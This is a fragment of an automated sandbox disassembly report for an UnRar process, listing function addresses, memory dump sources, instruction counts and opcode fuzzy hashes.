                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: bdcddba9236e77fc6200ebd8042b08724559af9cda0c76695a34d223874ba5eb
                                                            • Instruction ID: 74e7c7da14cac1a6a8a5ac1b121837e4be5152a1f44acb94be2ada57437c594c
                                                            • Opcode Fuzzy Hash: bdcddba9236e77fc6200ebd8042b08724559af9cda0c76695a34d223874ba5eb
                                                            • Instruction Fuzzy Hash: 40B09220E07A0ACAFA083B226CC622862A4BF58704FCA01B8C09D50334DF3C24AB9720
                                                            Function 00007FF7AACEE980 Relevance: .9, Instructions: 874COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53e80c1d97bfb715bc7c8b8e06359a77458f374f9e06774b24eeb149ec204d56
                                                            • Instruction ID: a2663329148655068e8a43c857ae1ace135a62aa713d88815566d9cffcdfea60
                                                            • Opcode Fuzzy Hash: 53e80c1d97bfb715bc7c8b8e06359a77458f374f9e06774b24eeb149ec204d56
                                                            • Instruction Fuzzy Hash: 277245B3A0A2C1C6F7259F24D104BBCBB61F761B84F8AC175CA4D077A5CB38A856D760
                                                            Function 00007FF7AACEE168 Relevance: .6, Instructions: 561COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccc88fdd3b5efdbab074a080ae1092dea1388b2b25fb7766957fe6e0ab51c9cc
                                                            • Instruction ID: d23334335ba16748778153f4961a8946164d953a507b2573dffab41456948709
                                                            • Opcode Fuzzy Hash: ccc88fdd3b5efdbab074a080ae1092dea1388b2b25fb7766957fe6e0ab51c9cc
                                                            • Instruction Fuzzy Hash: 8222FEB2A09185DBF3289F28E444BBCB7A1F764788F458139CB4A47B94DB3CE855DB10
                                                            Function 00007FF7AACD4E34 Relevance: .4, Instructions: 441COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ade5bfcc59de1c6f347f7f3e88eba0d9806264f5744f6987fcaf15564be9747f
                                                            • Instruction ID: fa4c70e7c230ed53e587c473bbcfeadd315559f92cd4a18ef4bb541764f667fb
                                                            • Opcode Fuzzy Hash: ade5bfcc59de1c6f347f7f3e88eba0d9806264f5744f6987fcaf15564be9747f
                                                            • Instruction Fuzzy Hash: 51F12773F2A1568BF719CE38C45467CBBA1F745704B96423DDA1B83AA4CB39E906C710
                                                            Function 00007FF7AACDC044 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1884412fef7d15b0bb00f8fad5d6cea5bdd720239b35a3106585fb2541ad194
                                                            • Instruction ID: c0fe229263024f8dee83948347f6626df645b6022a7fbb14c894452ec2ddd25e
                                                            • Opcode Fuzzy Hash: b1884412fef7d15b0bb00f8fad5d6cea5bdd720239b35a3106585fb2541ad194
                                                            • Instruction Fuzzy Hash: C9C1E172B0A681C6F72ADE38C1947B97391FB44B49F464139DF4A87769CE38E942C710
                                                            Function 00007FF7AACE8F1C Relevance: .3, Instructions: 299COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f77394c01609f27c41c3ac6ae77c155771d91a53f40d225ab19350d9b280dd5
                                                            • Instruction ID: fdb0cd4999e2c2f428789f02e68ffe07199695d6300491699fe9ff3b9d5de736
                                                            • Opcode Fuzzy Hash: 3f77394c01609f27c41c3ac6ae77c155771d91a53f40d225ab19350d9b280dd5
                                                            • Instruction Fuzzy Hash: 09C163B3A19281C7F724DF25D404ABCF761F764B48F868135CA094BB99DA3ED842DB60
                                                            Function 00007FF7AACE936C Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f39385b8e55789a2c81f3b2b4887247aa679dc71612f641f495a27e3a6c6984
                                                            • Instruction ID: 77a963aaf5996c0f6dc2f76aa5f46de0fec67ef7528746e09d1d4bc042e06dba
                                                            • Opcode Fuzzy Hash: 1f39385b8e55789a2c81f3b2b4887247aa679dc71612f641f495a27e3a6c6984
                                                            • Instruction Fuzzy Hash: 43C10672A09282C6FB24AF28C1003FCA751FB65744F829271DE4E276A6DF3DE142D360
                                                            Function 00007FF7AACE97DC Relevance: .3, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 932e3bdbc78c29e4bd3d4344761cee4e2e6a7f8ce7384fbe717f8e4df26a98d6
                                                            • Instruction ID: 99fa2d266c3eb975ac79858f76b63a25bd59f7cbf23f1d968c38b2e5c55e9777
                                                            • Opcode Fuzzy Hash: 932e3bdbc78c29e4bd3d4344761cee4e2e6a7f8ce7384fbe717f8e4df26a98d6
                                                            • Instruction Fuzzy Hash: 00A15473A0A182C6FB31EA24C4047BDE791EBA1744F8745B5CA4E177A5DE3DE842E360
                                                            Function 00007FF7AACDB814 Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ad80c578909cc2be3e227695c81b1f9baa84bb2f52d0928b44bf436ecd112da
                                                            • Instruction ID: ad9f0d3702aac90b1241065f8458290c04f485ffdeb840216ecf9a38301da39c
                                                            • Opcode Fuzzy Hash: 6ad80c578909cc2be3e227695c81b1f9baa84bb2f52d0928b44bf436ecd112da
                                                            • Instruction Fuzzy Hash: CCC17E33E192D08DF342CBB594194FD3FB1E75D34C74982A2EFD862A4AC92D9601DB60
                                                            Function 00007FF7AACBF394 Relevance: .2, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Caller
                                                            • String ID:
                                                            • API String ID: 4202421803-0
                                                            • Opcode ID: d6676e15368fd54f2f91a13e45b2c6e8269c9b65125dc00fe05b60ff74e2d372
                                                            • Instruction ID: d7b40bc30a37e3bcec5a3e437ee89460525b4b83526e9e711230e3b99c894dc3
                                                            • Opcode Fuzzy Hash: d6676e15368fd54f2f91a13e45b2c6e8269c9b65125dc00fe05b60ff74e2d372
                                                            • Instruction Fuzzy Hash: 9A91EF23A09AC196FB11EF28D4006EDA720FB95788F451231EF4E53B69EF39E646C350
                                                            Function 00007FF7AACE6A48 Relevance: .2, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba8e014b270dd00ed32f7015d92350f5a7e0cbbde35655a4e3af8aac88918557
                                                            • Instruction ID: e4deb02e37b728d5158c335b9d8954405b59bdae6233acc68efa4de7af70dd2f
                                                            • Opcode Fuzzy Hash: ba8e014b270dd00ed32f7015d92350f5a7e0cbbde35655a4e3af8aac88918557
                                                            • Instruction Fuzzy Hash: 79916432625542DBE7189F2886544ECB6A2F754310FD94339DB09CBAA9C73AF532CB60
                                                            Function 00007FF7AACDBDF0 Relevance: .2, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 821c092788e49d5d39d991fea901c6404a9d37648bbc5aa3c2d5f5ef7cec2b81
                                                            • Instruction ID: f87e7ba3525367c2a4999fbe1d6edda9442d9ba0353fef6abd533b9e6d7d82a5
                                                            • Opcode Fuzzy Hash: 821c092788e49d5d39d991fea901c6404a9d37648bbc5aa3c2d5f5ef7cec2b81
                                                            • Instruction Fuzzy Hash: E3712622F1A1D589FB019F7485004FDFFB1EB597847868072CF9AA7A57DA38E146CB20
                                                            Function 00007FF7AACDCC78 Relevance: .2, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 981f3dc2aa8fc0138a6978989dc6b569b79e18165ff135f29835d04f36a483ea
                                                            • Instruction ID: 8abc75ad71f457867fe0f0f57f3318cd659b50f8420237f329ee3b84bf3faf44
                                                            • Opcode Fuzzy Hash: 981f3dc2aa8fc0138a6978989dc6b569b79e18165ff135f29835d04f36a483ea
                                                            • Instruction Fuzzy Hash: BF71F237A29AC58AE7028F3CD4014ACB720FFA6B85B469326DF9473725EB319646C350
                                                            Function 00007FF7AACE0E38 Relevance: .1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7267490d2895fec2a6defa5be9e0bfe020d2887d6fe1acfabce2517a07fd18ed
                                                            • Instruction ID: 146bb503d3314363524c52b014bf4b90dde3f5705369c8eb1a63a208cf7a47f3
                                                            • Opcode Fuzzy Hash: 7267490d2895fec2a6defa5be9e0bfe020d2887d6fe1acfabce2517a07fd18ed
                                                            • Instruction Fuzzy Hash: 2051C277728690DBD754CF29E40099EB3A0F388784F419129EE9A93B14CF39E955CF80
                                                            Function 00007FF7AACE8108 Relevance: .1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43a7660baa3b6bc471f0e587731465fe583606e5ef02f6953d238623a0de6751
                                                            • Instruction ID: 19a18fa2e2d9f7f2ec14d5c24244c35ffbb4aa7e342b342a506bea56beff2fc7
                                                            • Opcode Fuzzy Hash: 43a7660baa3b6bc471f0e587731465fe583606e5ef02f6953d238623a0de6751
                                                            • Instruction Fuzzy Hash: 40513673A19581C7F3298F28D1047BCB3A1FBA4B48F868630DB4907A95CE3DD686DB00
                                                            Function 00007FF7AACE89F8 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9a4c27f6be5b7b4187048681c2d8bd152125c6a740f72cb23b79cb2b7327870
                                                            • Instruction ID: d631ddee10a4fb241b816f7a76dc423cbae9289453ed5b5c0b94ce9759f20ea3
                                                            • Opcode Fuzzy Hash: f9a4c27f6be5b7b4187048681c2d8bd152125c6a740f72cb23b79cb2b7327870
                                                            • Instruction Fuzzy Hash: 843124B2A09681CFF719EE16D95027EB7D1F755390F818079DB4A83B52DA3CE452CB20
                                                            Function 00007FF7AACBEB1C Relevance: .1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b31ba28be2f9c17c38ab29f52c292afbd3925b8dfcc1acd108498cad7e09bd35
                                                            • Instruction ID: 43cd1abc97fd6a8516e0dee7c2243537cbf3e40d4fa0c1b2749946986275f13b
                                                            • Opcode Fuzzy Hash: b31ba28be2f9c17c38ab29f52c292afbd3925b8dfcc1acd108498cad7e09bd35
                                                            • Instruction Fuzzy Hash: 37412BA36213F48BF3408F1694505A9BBE0F38CB41F859029EFC617742CB39D962DB50
                                                            Function 00007FF7AACBE504 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f14ec9c3bccdbf129c9b2e5b53d5c4e7cd8e099b41e03083daa799878eff7372
                                                            • Instruction ID: e17972a06080300aaff43d2878f187c32af9d1a61a84038ac9ca586af286c394
                                                            • Opcode Fuzzy Hash: f14ec9c3bccdbf129c9b2e5b53d5c4e7cd8e099b41e03083daa799878eff7372
                                                            • Instruction Fuzzy Hash: 894109726343A48BF64ACB19995857973A4F718B89F824125EFC9C77C5CA3CFA05C720
                                                            Function 00007FF7AACBED54 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
